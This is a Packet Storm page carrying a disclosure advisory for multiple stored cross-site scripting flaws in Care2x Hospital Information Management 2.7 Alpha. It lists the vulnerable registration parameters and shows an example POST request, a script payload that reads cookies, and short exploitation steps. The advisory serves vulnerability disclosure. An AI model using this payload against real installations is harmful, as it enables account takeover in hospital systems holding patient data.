what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Care2x Open Source Hospital Information Management 2.7 Alpha XSS

Care2x Open Source Hospital Information Management 2.7 Alpha XSS
Posted Aug 13, 2021
Authored by securityforeveryone.com

Care2x Open Source Hospital Information Management version 2.7 Alpha suffers from multiple persistent cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | fafe260191f7f33dbb5f9100375b9a94aff61fd839113d0ed42f615822e7e232
Download | Favorite | View

Care2x Open Source Hospital Information Management 2.7 Alpha XSS

Change Mirror Download
# Exploit Title: Care2x Open Source Hospital Information Management 2.7 Alpha - 'Multiple' Stored XSS
# Date: 13.08.2021
# Exploit Author: securityforeveryone.com
# Author Mail: hello[AT]securityforeveryone.com
# Vendor Homepage: https://care2x.org
# Software Link: https://sourceforge.net/projects/care2002/
# Version: =< 2.7 Alpha
# Tested on: Linux/Windows
# Researchers : Security For Everyone Team - https://securityforeveryone.com

'''

DESCRIPTION

Stored Cross Site Scripting(XSS) vulnerability in Care2x Hospital Information Management 2.7 Alpha. The vulnerability has found POST requests in /modules/registration_admission/patient_register.php page with "name_middle", "addr_str", "station", "name_maiden", "name_2", "name_3" parameters.


Example: /modules/registration_admission/patient_register.php POST request

Content-Disposition: form-data; name="date_reg"

2021-07-29 12:15:59
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="title"

asd
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="name_last"

asd
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="name_first"

asd
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="name_2"

XSS
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="name_3"

XSS
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="name_middle"

XSS
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="name_maiden"

XSS
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="name_others"

XSS
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="date_birth"

05/07/2021
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="sex"

m
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="addr_str"

XSS
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="addr_str_nr"

XSS
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="addr_zip"

XSS
---------------------
 
If an attacker exploit this vulnerability, takeover any account wants.

Payload Used:

"><script>alert(document.cookie)</script>

EXPLOITATION

1- Login to Care2x Panel
2- /modules/registration_admission/patient_register.php
3- Use the payload vulnerable parameters.


ABOUT SECURITY FOR EVERYONE TEAM

We are a team that has been working on cyber security in the industry for a long time.
In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities.
We have many free tools that you can use here: https://securityforeveryone.com/tools/free-security-tools

'''
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    0 Files
  • 6
    Sep 6th
    0 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close